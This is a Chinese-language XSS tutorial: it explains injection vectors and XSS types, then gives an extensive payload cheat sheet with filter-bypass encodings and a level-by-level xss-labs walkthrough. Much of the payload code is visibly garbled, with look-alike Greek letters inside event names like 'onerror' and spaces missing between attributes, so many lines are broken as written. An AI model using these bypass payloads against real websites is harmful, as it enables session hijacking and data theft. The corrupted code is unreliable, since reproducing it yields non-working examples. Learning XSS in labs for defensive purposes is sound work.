文章目录
XSS(Cross-Site Scripting,跨站脚本攻击)是一种经典的网络攻击技术,攻击者通过注入恶意代码,使其在用户的浏览器中执行,从而窃取敏感信息、控制用户会话或劫持网页行为。
XSS 的攻击方式多种多样:
- 动态注入:通过不安全的输出函数,将恶意 JavaScript 直接插入页面中。
- 文件攻击:利用文件上传(如 PDF、SVG 文件等),让浏览器在解析文件时执行嵌入的恶意代码。
原理解析:
XSS 的核心在于:利用用户信任的网页,诱使浏览器执行攻击者的恶意代码。
攻击者会将恶意脚本嵌入页面的某些部分,如:
<script>标签- HTML 事件属性(如
onerror,onclick) - 伪协议(如
javascript:)
当用户访问受感染的页面时,浏览器在解析 HTML 或处理文件时会执行这些恶意代码,造成安全威胁。
触发方式
文件内容中的xss
PDFxss
利用嵌入在 PDF 文件中的恶意脚本来触发的攻击。这种攻击通常依赖于浏览器对 PDF 的内置解析能力。
触发点:
- PDF 文件中的
JavaScript Actions或URI Actions。 - 特殊的嵌入点,如
Launch,GoToR, 或恶意的链接。
执行条件:
- 用户在浏览器中直接打开 PDF 文件,触发浏览器的 PDF 解析器。
- 某些浏览器可能会自动解析 PDF 文件中的 JavaScript。
SVGxss
利用 SVG(可扩展矢量图形)文件中的恶意代码触发的攻击。SVG 是一种基于 XML 的图形格式,支持嵌入脚本和动态内容,因此也是XSS 攻击的潜在载体
触发点:
- SVG 文件中的
<script>标签。 - 事件处理器(如
onload,onclick等)。
执行条件:
- 浏览器直接加载或解析 SVG 文件。
例如:在svg文件中插入恶意脚本
<svg xmlns="http://www.w3.org/2000/svg"><script>alert("XSS triggered in SVG!");</script></svg>
XMLxss
可以包含嵌套的动态脚本内容
HTMLxss
直接嵌入恶意的
<script>
标签
MIME伪造
攻击者上传的文件可能被伪装成无害文件(如图片),但实际上包含恶意代码。如果服务器没有严格验证文件内容和 MIME 类型,浏览器可能将其解析为 HTML 或脚本。
例如:上传一个伪装成图片的HTML文件,服务器没有验证 MIME 类型,浏览器可能会直接解析并执行其中的 js代码
Content-Type: image/jpeg<html><script>alert('XSS via MIME type');</script></html>
文件名中的xss
在文件名中写入恶意js代码。如果服务器在页面中直接输出文件名,而没有对其进行适当的转义,攻击者可以通过特殊文件名触发 XSS
例如:恶意文件名
"><script>alert('XSS from filename')</script>.jpg
如果文件名直接被嵌入到html文件中,恶意脚本就会被执行
<imgsrc="/uploads/"><script>alert('XSS')</script>.jpg">
HTTP请求中的xss
url参数
在url参数中注入恶意脚本,利用应用程序直接将其输出到html页面中。
例如:
http://example.com/page?name=<script>alert('XSS')</script>
HTTP头部
如:
User-Agent
,
Referer
,
Cookie
等等。如果应用程序记录这些头信息并将其显示到页面中(如日志页面或分析页面),可能会触发 XSS。
例如:
Referer: <script>alert('XSS')</script>
表单提交数据
攻击者在表单提交的数据中注入脚本。如果应用未对表单内容进行清理,可能会直接输出到页面中。
json数据
一些应用程序通过 JSON 数据与前端交互。如果 JSON 数据包含用户输入内容,并且前端直接将其插入 DOM 中,可能触发 XSS。
例如:后端返回:
{"message":"<script>alert('XSS')</script>"}
前端直接使用:
document.body.innerHTML = response.message;
其他
富文本编辑器
富文本编辑器允许用户输入 HTML 内容,如
<b>
或
<i>
标签。如果未对输入内容进行过滤,可能会导致 XSS。
例如:
<bonmouseover="alert('XSS')">Hover me!</b>
DOM元素操作
DOM-Based XSS 直接利用浏览器中的 JavaScript 操作 DOM 的特性,通过动态注入恶意内容触发攻击。
常见漏洞点:
- 动态插入 HTML 内容(
innerHTML)。 - URL 解析和操作(
document.location,window.location.hash)。 - 动态创建脚本标签(
document.createElement('script'))。
例如:
document.write(location.hash);
图片标签
图片标签(
<img>
)可以通过事件处理器(如
onerror
)注入脚本
例如:
<imgsrc="invalid.jpg"onerror="alert('XSS')">
CSRF结合xss
攻击者通过 CSRF(Cross-Site Request Forgery)在用户已登录的情况下发送恶意请求,并通过 XSS 扩大攻击范围。
动态生成的错误信息
攻击者通过提交恶意输入触发错误页面或调试信息显示,利用这些输出作为攻击载体。
例如:
Error: Invalid input "<script>alert('XSS')</script>"
社交平台或帖子下面评论
攻击者在社交平台的帖子或评论中注入恶意代码。如果平台未过滤用户生成的内容,可能导致 XSS
例如:
<script>alert('XSS in here!');</script>
分类:
根据攻击脚本存储的方式
反射型
属于非持久型,触发点在url参数里,提交数据到服务器,服务器返回给浏览器,需手动发给用户,用户点击之后触发js代码
存储型
属于持久型 ,提交的恶意代码存储在数据库里,只要用户访问就能执行恶意代码
根据脚本是否通过服务器处理
dom型
属于非持久型,并没有经过服务器的处理就写到了页面里,典型就是jquery-xss
反射型和存储型
需要通过服务器进行处理。服务器会将用户输入嵌入到返回的 HTML 中,导致浏览器解析并执行脚本。
根据持久性
持久型(存储型 XSS)
: 攻击脚本被存储下来,每次访问相关页面时都会触发,具有持续性。
非持久型(反射型和 DOM 型 XSS)
: 攻击脚本不被存储,通常需要通过用户交互(如点击链接)触发。
根据攻击范围
self-xss
:攻击脚本只能影响自己。
常见的js触发标签
无过滤情况
0x01 <script>
<script>alert("x");</script>
0x02
图片加载错误时触发<imgsrc="x"onerror=alert(1)><img src="1" οnerrοr=eval("alert('xss')")>鼠标指针移动到元素时触发<imgsrc=1onmouseover="alert(1)">鼠标指针移出时触发<imgsrc=1onmouseout="alert(1)">
<ahref="https://www.qq.com">qq</a><a href=javascript:alert('xss')>test</a><ahref="javascript:a"onmouseover="alert(/xss/)">aa</a><a href="" οnclick=alert('xss')>a</a><a href="" οnclick=eval(alert('xss'))>aa</a><a href=kycg.asp?ttt=1000 οnmοuseοver=prompt('xss') y=2016>aa</a>
0x04 <input>
<inputonfocus="alert('xss');">竞争焦点,从而触发onblur事件<input οnblur=alert("xss") autofocus><inputautofocus>通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发<inputonfocus="alert('xss');"autofocus><inputname="name"value=""><input value="" οnclick=alert('xss') type="text"><input name="name" value="" οnmοuseοver=prompt('xss') bad=""><inputname="name"value=""><script>alert('xss')</script>按下按键时触发<inputtype="text"onkeydown="alert(1)">按下按键时触发<inputtype="text"onkeypress="alert(1)">松开按键式时触发<inputtype="text"onkeyup="alert(1)">
0x05 <from>
<form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')><form method=post action=aa.asp? οnmοuseοver=prompt('xss')><form method=post action=aa.asp? οnmοuseοver=alert('xss')><form action=1 οnmοuseοver=alert('xss)><formmethod=postaction="data:text/html;base64,<script>alert('xss')</script>"><formmethod=postaction="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
0x06<iframe>
<iframe οnlοad=alert("xss");></iframe><iframe src=javascript:alert('xss')></iframe><iframesrc="data:text/html,<script>alert('xss')</script>"></iframe><iframesrc="data:text/html;base64,<script>alert('xss')</script>"><iframesrc="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><iframe src="aaa" οnmοuseοver=alert('xss') /><iframe><iframesrc="javascript:prompt(``xss``)"></iframe>(````只有两个``)
0x07<svg>
<svgonload=alert(1)>
0x08<body>
<bodyonload="alert(1)">利用换行符以及autofocus,自动去触发onscroll事件,无需用户去触发<body οnscrοll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><inputautofocus>
0x09<button>
元素上点击鼠标时触发<buttononclick="alert(1)">text</button>
0x0A
元素上按下鼠标时触发<ponmousedown="alert(1)">text</p>元素上释放鼠标时触发<ponmouseup="alert(1)">text</p>
0x0B
元素上按下鼠标时触发<ponmousedown="alert(1)">text</p>元素上释放鼠标时触发<ponmouseup="alert(1)">text</p>
0x0C<select>
<selectonfocus=alert(1)></select>通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发<selectonfocus=alert(1)autofocus>
0x0D|
<video><sourceonerror="alert(1)">
0x0E
<audio src=x οnerrοr=alert("xss");>
0x0F<textarea>
<textarea οnfοcus=alert("xss"); autofocus>
0x10<keygen>
<keygenautofocusonfocus=alert(1)> //仅限火狐
0x11<marquee>
<marquee onstart=alert("xss")></marquee> //Chrome不行,火狐和IE都可以
0x12<isindex>
<isindex type=image src=1 οnerrοr=alert("xss")>//仅限于IE
0x13利用link远程包含js文件
<linkrel=importhref="http://127.0.0.1/1.js"> //在无CSP的情况下才可以
0x14js伪协议|
<a>标签<a href="javascript:alert('xss');">xss</a><iframe>标签<iframe src=javascript:alert('xss');></iframe><img>标签<img src=javascript:alert('xss')>//IE7以下<form>标签<form action="Javascript:alert(1)"><input type=submit>
0x15expression属性
<imgstyle="xss:expression(alert('xss''))"> // IE7以下<divstyle="color:rgb(''�x:expression(alert(1))"></div> //IE7以下<style>#test{x:expression(alert(/XSS/))}</style> // IE7以下
0x16background属性
<tablebackground=javascript:alert(1)></table> //在Opera 10.5和IE6上有效
有过滤情况
0x01过滤空格
使用\代替空格<img/src="x"/οnerrοr=alert("xss");>
0x02过滤关键字
大小写绕过<ImG sRc=x onerRor=alert("xss");>双写关键字(有些waf可能会只替换一次且是替换为空,这种情况下我们可以考虑双写关键字绕过)<imimgg srsrcc=x οnerrοr=alert("xss");>字符拼接(利用eval)<imgsrc="x"onerror="a=aler;b=t;c='(xss);';eval(a+b+c)">字符拼接(利用top)<script>top["al"+"ert"](``xss``);</script>(只有两个``这里是为了凸显出有`符号)
0x03其他字符混淆
有的waf可能是用正则表达式去检测是否有xss攻击,如果我们能fuzz出正则的规则,则我们就可以使用其它字符去混淆我们注入的代码了下面举几个简单的例子可利用注释、标签的优先级等<<script>alert("xss");//<</script><scri<!--test-->pt>alert("hello world!")</scri<!--test-->pt><title><imgsrc=</title>><imgsrc=xonerror="alert(``xss``);"> 因为title标签的优先级比img的高,所以会先闭合title,从而导致前面的img标签无效<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>
0x04过滤单双引号
如果是html标签中,我们可以不用引号;如果是在js中,我们可以用反引号代替单双引号<imgsrc="x"onerror=alert(``xss``);>使用编码绕过,具体看下面列举的例子:Unicode编码绕过<imgsrc="x"onerror="alert("xss");"><imgsrc="x"onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">url编码绕过<imgsrc="x"onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"><iframesrc="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>Ascii码绕过<imgsrc="x"onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">Hex绕过<img src=x οnerrοr=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>八进制绕过<img src=x οnerrοr=alert('\170\163\163')>base64绕过<imgsrc="x"onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"><iframesrc="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
0x05过滤括号
当括号被过滤的时候可以使用throw来绕过<svg/οnlοad="window.οnerrοr=eval;throw'=alert\x281\x29';">
0x06过滤url地址
使用url编码<img src="x" οnerrοr=document.location=``http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/``>使用IP<img src="x" οnerrοr=document.location=``http://2130706433/``>十进制<img src="x" οnerrοr=document.location=``http://0177.0.0.01/``>八进制<img src="x" οnerrοr=document.location=``http://0x7f.0x0.0x0.0x1/``>十六进制<img src="x" οnerrοr=document.location=``//www.baidu.com``>html标签中用//可以代替http://使用\ (注意:在windows下\本身就有特殊用途,是一个path 的写法,所以\在Windows下是file协议,在linux下才会是当前域的协议)使用中文逗号代替英文逗号<imgsrc="x"onerror="document.location=``http://www。baidu。com``">//会自动跳转到百度
xss-labs通关
level1-level10
level1(URL传参)
查看网页源码,发现get方式传入的参数直接被写入到网页html中
payload: ?name=<script>alert(1)</script>
level2(输入框注入)
尝试上一关的payload,发现行不通。
查看网页源码,发现被转义。第一部分进行了html实体转义,但是第二个没有
查看文件源码,
htmlspeacialchars()
函数会把一些预定义字符转换称html实体
echo"<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"
&:转换为&":转换为"':转换为成为 '<:转换为<>:转换为>
第二关这里只过滤了第一个str,使用
反标签符号闭合双引号
即可绕过(闭合value的引号和尖括号)
payload: "><script>alert(1)</script><"
level3(事件注入)
这关是单引号闭合,尝试level2的payload改为单引号,发现也被转义
查看文件源码,发现两个部分都使用了
htmlspecialchars()
函数
但是
htmlspecialchars()
只转义
<
和
>
,利用
onfocus事件
绕过
在js中有一个
onfocus函数,常与
<input>,
<select>,
<a>标签一起使用
获得焦点的事件,然后配合
js伪协议来执行js代码
payload:' οnfοcus=javascript:alert(1) '
输入提交之后还要再点一下搜索框,才能触发事件
level4(引号类型)
这关是双引号闭合,将上一关payload改为双引号闭合,再点击搜索框即可触发事件
payload:" οnfοcus=javascript:alert(1) "
level5(a标签注入)
输入上一关的payload,发现
onfocus
被替换成
o_nfocus
尝试输入
<script>
,发现被强制改为
scr_ipt
查看文件源代码发现
strtolower
函数把所有字母转换成小写,并且
str_replace
函数会将script和on替换
这时使用
<a>标签
的
href
属性,尝试注入(前提是闭合号<“”>没失效)
<ahref="javascript:alert(1);">xx</a>
要添加一个标签就得先闭合前面的标签
发现前后分别少了“> 和<” ,构造payload
"><ahref="javascript:alert(1);">xx</a><"
然后点击出现的xx,结束
level6(大小写绕过)
使用上一关的payload失败,查看网页源码发现
href
变成
hr_ef
然后尝试onfocus绕过也失败,然后尝试大小写,发现可以
//第一种,脚本注入" ><SCRIPT>alert(1)</SCRIPT>< "//第二种,焦点事件" ONDOCUS=javascript:alert(1) "//a标签href属性的"> <aHREF=javascript:alert(1)>x</a> <"
查看文件源代码,发现使用了
str_replace
函数进行替换,但还好没用使用大小写转换函数,因此可以用大小写替换进行绕过
str_replace
函数
level7(双写绕过)
尝试上一关的payload,发现过滤了script、href等并且有转换小写的函数
尝试双写绕过,发现成功绕过
payload:" ><sscriptcript>alert(1)</sscriptcript>< "
查看文件源代码,同样过滤了一些东西
不出意料过滤了很多东西
其中
src
是一个指向,与href差不多,但执行内容不同
data
一般在
<iframe>
标签中配合
data:text/html
在第二关测一下src,配合
onerror属性
,插入一个
\<img>
标签,闭合掉双引号和括号
onerror属性指的是当图片加载不出来的时候会触发js函数,因为这里src指的是666,而不是图片地址,就会触发alert函数
"> <img src='666' οnerrοr=alert(1)> <"
img标签其他姿势
1.当鼠标移出图片的时候执行的属性
onmouseout
"> <img src=666 οnmοuseοut="alert(1)"> <"
2.当鼠标移动到图片的时候执行的属性
onmouseover
"> <img src=1 οnmοuseοver="alert(1)"> <"
再看一下
data
利用iframe标签,插入一个标签
data:text/html;base64,
将后面的内容进行base64解码
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
进行Base64解码是
<script>alert()</script>
"> <iframe src="data://text/html;base64,PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+"> <"
level8(Unicode编码)
尝试一下前面的大小写payload,发现输入的值被插入到两个地方,并且存在字符串过滤和强制转换小写
试试过滤了什么,发现有强制转换称小写字母,有
htmlspecialchars
函数,过滤了
src、data、onfocus、href、script
" sRc DaTa OnFocus <sCriPt><a hReF=javascript:alert(1)>
双写也失败
这里利用
href的隐藏属性自动解码Unicode
,可以插入一段js伪协议
javascript:alert(1)unicode编码之后变成:javascript:alert(1)
最后查看一下文件源代码,发现过滤了好多字符,并且将双引号也进行实体化了
level9(指定字符绕过)
先试试测试一下关键字过滤了什么
" sRc DaTa OnFocus <sCriPt><a hReF=javascript:alert()>
发现存在强制转换小写和实体化
不知道怎么搞了,查看文件源码
当传入参数不包含
http://
时,其值为假,将触发if语句的执行。
因此我们需要在参数中添加
http://
,并将其注释掉,防止被实际执行影响弹窗的显示。
为了确保strops函数能返回一个数值,需构造一个特定的payload
javascript:alert(1)进行unicode编码,并在后面加上http://,并将它注释掉javascript:alert(1)/* <http://> */
level10(属性修改)
这个需要get传参,测试一下关键字
" sRc DaTa OnFocus <sCriPt><ahReF=javascript:alert()>
传进去的参数只插入了h2,并且下面一堆input有hidden。并且双引号和<>也被实体化了
查看文件源代码发现还有其他隐藏的传参方法,下次要一个一个测试,这里get传参
t_sort
,并且过滤<>,但是可以用onfocus事件
由于输入框被隐藏,需要添加type=“text”,构造payload
?t_sort=" οnfοcus=javascript:alert() type="text
level11-level20
level11(referer传参)
直接跳转是来到下面这个页面,t_ref默认带value,发现是http头的
referer
参数|
referer负责记录是从哪个地址转跳到这里的
首先看页面源代码有四个参数,挨个get传参发现没反应,post也是。抓包尝试修改referer,发现t_ref变化
回显的t_ref中<>被删掉,可以用
onfocus
,
payload: Referer:" οnfοcus=javascript:alert() type="text
最后查看一下文件源码,发现确实是这样,并且过滤了<>
level12(UA头传参)
这次t_ua的值是UA头的值,尝试UA头传参,用上一个payload即可
payload: User-Agent:" οnfοcus=javascript:alert() type="text
level13(cookie传参)
查看页面源代码,猜测这关是传入cookie
空格用+代替即可
payload:Cookie: user="+οnfοcus=javascript:alert()+type="text
level14(上传图片xss)
由于iframe调用的文件地址失效,无法进行测试。
本关主要利用
exif xss漏洞
,exif是一种可交换图像文件格式,可以记录照片的属性信息和拍摄数据。
level15(外部地址包含)
进入之后会发现一个
ng-include
ng-include是指文件包含,用来包含外部的html文件,如果包含的地址,需要加引号
尝试包含一下第一关?src='level1.php'
发现可以包含之前的关卡对其传参,达到弹窗的效果
依旧测试一下过滤:?src=" ' sRc DaTa OnFocus <sCriPt><a hReF=javascript:alert()>j
发现依然有html实体化函数,这里不能包含直接弹窗的东西如<script>,但可以用
<a>、<input>、<img>、<p>
等标签
payload:?src='level1.php?name=<img src=1 οnmοuseοver=alert()>'
当移动鼠标的时候触发弹窗
查看文件源代码,发现
htmlspecialchars
函数形同虚设
$str=$_GET["src"];echo'<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
level16(空格绕过)
keyword默认传入test,发现在center标签中,那就不用闭合了
依旧测试过滤
?keyword=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P<sCriPt><a hReF=javascript:alert()>j
有转换小写函数,将script标签替换成空格,然后将空格实体化,
查看文件源代码发现/也被替换
$str=strtolower($_GET["keyword"]);$str2=str_replace("script"," ",$str);$str3=str_replace(" "," ",$str2);$str4=str_replace("/"," ",$str3);$str5=str_replace(" "," ",$str4);echo"<center>".$str5."</center>";
但是空格可以用回车代替,回车的url编码为%0a
payload:?keyword=<svg%0Aonload=alert(1)>
level17(熟悉触发事件的使用)
先测试关键字
?arg01=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()>; &arg02=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P<sCriPt><a hReF=javascript:alert()>;
发现所有传入的参数都在
embed标签
中,打开这个swf文件(flash插件文件,但现在很多浏览器都不支持),
我们改一下源代码,将src指向其它图片即可,然后使用下面的payload,再点击一下src指向的图片即可
payload:?arg02= onclick=alert()
level18
和上一关一模一样
level19(Flash xss)
换一个支持flash插件的浏览器,使用前面的payload,但是由于有实体化函数,无法闭合
这里用到Flash xss注入,即往Flash里面插入一段js代码,然后手动执行
payload:?arg01=version&arg02=<a href="javascript:alert()">here</a>
level20(Flash xss)
这里也是有双引号
payload:?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123
其中的
"
是为了闭合,让id不等于
xss))}catch(e){alert(/xss/)}//
,因为id的值会全部传入到flash中。
\
是为了转义,如果不加
\
,
id
就会变成
xss
。
//
后面的
%26width=123&26height=123
,
%26
其实是
&
版权归原作者 Clockwiseee 所有, 如有侵权,请联系我们删除。